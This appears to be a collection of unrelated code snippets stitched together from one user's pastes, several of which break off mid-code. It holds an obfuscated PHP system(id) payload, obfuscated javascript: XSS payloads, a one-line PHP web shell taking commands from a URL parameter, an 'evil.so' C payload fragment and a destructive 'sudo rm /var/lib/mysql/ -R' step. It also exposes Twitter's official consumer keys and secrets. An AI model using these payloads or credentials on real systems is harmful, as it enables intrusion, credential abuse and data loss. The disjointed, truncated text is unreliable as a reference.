tarunkant

/* system(id) */
<?=$Φ=([].Φ)[![]+![]+![]]?><?=$Χ=++$Φ?><?=$Ψ=++$Χ?><?=$Ω=++$Ψ?><?=$Ϊ=++$Ω?><?=$Ϋ=++$Ϊ?><?=$ά=++$Ϋ?><?=$έ=++$ά?><?=$ή=++$έ?><?=$ί=++$ή?><?=$ΰ=++$ί?><?=$α=++$ΰ?><?=$β=++$α?><?=$γ=++$β?><?=$δ=++$γ?><?=$ε=++$δ?><?=$ζ=++$ε?><?=$η=++$ζ?><?=$θ=++$η?><?=$ι=++$θ?><?=$κ=++$ι?><?=$λ=++$κ?><?=$μ=++$λ?><?=$ν=++$μ?><?=$ξ=++$ν?><?=$ο=++$ξ?><?=$ο=([].Φ)[![]+![]+![]]?><?=($η.$ν.$η.$θ.$Ω.$α)($έ.$Ψ)?>


<!-- 
  Explanation:
    - Some of the characters might look like alphanumeric, but they are Unicode characters.
    - 'ArrayΦ' <-> [].Φ
    - 1 <-> ![]
    - 'a' <-> ([].Φ)[![]+![]+![]]

tarunkant

Mathboy7 (415pt)

ENCRYPT() 함수를 통해 Random String을 만들 수 있음

encryption-functions from mysql.com

1. ENCRYPT(x) 시 확률상 문제를 풀 수 없지만, salt 값을 설정하면 첫번째 몇 글자 정도는 같게 되므로 확률이 굉장히 줄어듬.

2. ENCRYPT(x,y) 출력시 나오는 값은 A-Za-z0-9./ 로 이루어져있어서 확률상 어렵지만, 문제에서 strtolower($var) 로 인해 확률이 2차적으로 줄어들음.

tarunkant

MySQL Download URL

https://dev.mysql.com/get/Downloads/MySQL-5.5/mysql-5.5.56-linux-glibc2.5-x86_64.tar.gz

Open the terminal and follow along:

• Uninstall any existing version of MySQL

sudo rm /var/lib/mysql/ -R

tarunkant

/* compile: gcc -Wall -fPIC -shared -o evil.so evil.c -ldl */

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

void payload(char *cmd) {
  char buf[512];
  strcpy(buf, cmd);
  strcat(buf, " > /tmp/_0utput.txt");

tarunkant

Twitter Official Consumer Key

Twitter for Android

type:            PIN
Consumer key:    3nVuSoBZnx6U4vzUxf5w
Consumer secret: Bcs59EFbbsdF6Sl9Ng71smgStWEGwXXKSjYvPVt7qys

Twitter for iPhone

type:            PIN

Consumer key: IQKbtAYlXLripLGPWd0HUA

tarunkant

 # | Expression  | Result      | Comments
---+-------------+-------------+--------------------------------------------------------------------
 1 | "$a"        | apple       | variables are expanded inside ""
 2 | '$a'        | $a          | variables are not expanded inside ''
 3 | "'$a'"      | 'apple'     | '' has no special meaning inside ""
 4 | '"$a"'      | "$a"        | "" is treated literally inside ''
 5 | '\''        | **invalid** | can not escape a ' within ''; use "'" or $'\'' (ANSI-C quoting)
 6 | "red$arocks"| red         | $arocks does not expand $a; use ${a}rocks to preserve $a
 7 | "redapple$" | redapple$   | $ followed by no variable name evaluates to $
 8 | '\"'        | \"          | \ has no special meaning inside ''

tarunkant

# search.py

def search(obj, max_depth):
    
    visited_clss = []
    visited_objs = []
    
    def visit(obj, path='obj', depth=0):
        yield path, obj
        

tarunkant

javascript:URL['\143\157\156\163\164\162\165\143\164\157\162']('\141\154\145\162\164()')();

javascript:CSS['\143\157\156\163\164\162\165\143\164\157\162']('\141\154\145\162\164()')();

javascript:Ð=[],Ř=+!+Ð,ˍ=Ř+Ř+Ř,Š=!!Ð+Ð,Ť=!Ð+Ð,Ǎ=(!Ð+{})[Ř+[+Ð]],Č=(Ð+{})[Ř],Ȟ=Š[Ř],Ě=Š[+Ð],_=Ť[ˍ]+Č+Ȟ+Ě,ǰ=Ð[_]+Ð,š=Ð[Ð]+Ð,Ð[_][Ǎ+Č+(š)[Ř]+Ť[ˍ]+Ě+Ȟ+(š)[+Ð]+Ǎ+Ě+Č+Ȟ](Ť[Ř]+Ť[Ř+Ř]+Š[ˍ]+Ȟ+Ě+ǰ[Ř+[ˍ]]+ǰ[Ř+[ˍ+Ř]])()

javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()

javascript:[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]

tarunkant

  query IntrospectionQuery {
    __schema {
      queryType { name }
      mutationType { name }
      subscriptionType { name }
      types {
        ...FullType
      }
      directives {

tarunkant

<?php 
system($_GET['cmd']); 
?>